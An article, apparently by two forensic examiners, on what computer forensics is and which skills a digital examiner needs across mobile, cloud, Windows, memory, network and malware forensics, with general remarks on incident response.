Cybercrimes cover a broad spectrum, from email scams to downloading copyrighted works for distribution, and are fueled by a desire to profit from another person’s intellectual property or private information.
Computer forensics, or digital forensics, is a fairly new field. It is the art and science of applying computer science to aid the legal process. The goal of computer forensics is to perform a structured investigation while maintaining a documented chain of evidence to find out exactly what happened on a computing device and who was responsible for it.
Forensic investigators typically follow a standard set of procedures. Computer forensics requires specialized expertise and tools that go beyond the usual methods of collecting and storing data available to end users or technical support personnel. This involves similar techniques and principles to data recovery, but with additional guidelines and practices designed to create a legal audit trail.
Computer forensics will play a greater role in exposing the malicious acts of people. As it continues to advance. It will make it more difficult for people to hide their wrongful acts and easier to have them held responsible.
Alfred Demirjian
The issues facing computer forensics examiners can be broken down into three broad categories: technical, legal and administrative.
- Technical issues
- Encryption
- Increasing storage space
- New technologies
- Anti-forensics
Forensics are critically important to the incident response process and are useful for both routine and timely response. For example, in an incident where a company is dealing with a successful phishing attack, forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished/compromised, and what information was actually accessed or taken.
Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.
What knowledge and skills should a digital examiner have?
Mobile forensics
There are a lot of mobile devices around. Luckily for digital examiners, the war between developers of mobile device operating systems is ended. Now 99% of mobile devices are running iOS or Android OS. Knowledge of the forensic artifacts of just two mobile operating systems allows a digital examiner to explore a vast number of mobile devices. Mobile devices store a lot of private data about their owners. This can be used to investigate crimes. Also, some mobile devices are vulnerable to a virus attack despite actions taken by the developers, which can lead to theft by private data hackers. There are several good tools for extracting and analyzing data from mobile devices, but manual analysis will result in detection of more forensic artifacts on the analyzed device.
Cloud Forensics
The cloud concept is very convenient for users. You can access your private information or working documents from anywhere in the world. Do not worry that a hard drive in a laptop or a desktop may break or that priceless family photos will become inaccessible in a broken smartphone. Many cloud services allow the user to copy all of his information and files to his local PC or a laptop for free. Exploring the artifacts of cloud services on the owner’s devices lets you understand what files were uploaded or downloaded to or from a cloud and other information about the use of cloud services and the data in the clouds.
Drone Forensics
Every day, more and more drones are used in everyday life. Investigating information extracted from drones will soon become a routine job for digital examiners. We already see the use of encryption to protect data in the memory of drones and the use of cloud services for storing information necessary for a drone’s successful functioning.
Windows Forensics
The vast majority of PCs and laptops are running Windows OS. Also, companies often use a server running Windows OS. Researchers constantly report the discovery of new artifacts that can be used in a forensic analysis. Therefore, knowledge of Windows Forensics is fundamental to any digital examiner.
Mac Forensics
Of course, the number of Mac computer owners varies from country to country, but the general trend is that the number of Macs falling into digital forensic laboratories is increasing. Knowledge in Mac Forensics will allow a digital examiner to successfully explore similar devices.
File Systems Forensics
There are not many basic file systems. These are: EXT, FAT, NTFS, HFS +. Knowledge of what kind of artifacts remain in the file systems is needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
Incident Response
There are a lot of tools on the internet for hackers and penetration testers. These tools allow you to automate the routine work of attackers. Therefore, the number of incidents associated with the theft of money, private or financial information is constantly increasing. The demand for digital examiners with Incident Response skills is constantly growing.
Memory Forensics
This is a specific area of knowledge that a digital examiner will not use on a day-to-day basis. However, knowledge in Memory Forensics allows significantly faster Incident Response, detection of malware, decrypting of drives and partitions. The examiner can retrieve other data and files that are stored in the RAM of the device under test.
Network Forensics
This allows detection of anomalies in the operation of computer networks and detection of an intruder. It is also used in dynamic analysis of malware.
Cyber Tread Intelligence
Hackers and pentesters can use a huge number of methods to penetrate an attacked computer or computer network. Knowledge of Cyber Tread Intelligence allows the examiner to separate several most likely methods of attack from a whole variety of methods. This allows you to reduce response time to an incident and identify all compromised computers and other devices (for example, routers).
Malware Forensics
Of course, a digital examiner does not have the same skills as a malware analyst. However, the knowledge of a digital examiner should suffice to understand which of the viruses participated in the incident (usually a compromised system contains several viruses) and understand how the attack was carried out on a compromised system. For example, a typical attack on a computer looks like this: an email with a malicious document arrives at the email address of the owner of the computer. When someone tries to open this document, it runs the powershell script that downloads an executable file (a virus). In order to understand how the incident happened and what happened on the compromised computer, knowledge in Malware Forensics is needed.
Conclusion
The article examined basic knowledge and skills that should help a digital examiner to work effectively. Of course, this list is not exhaustive. Developments in the computer industry require a digital examiner to learn new skills and knowledge.
Happy forensicating!
About the authors
Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.
Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.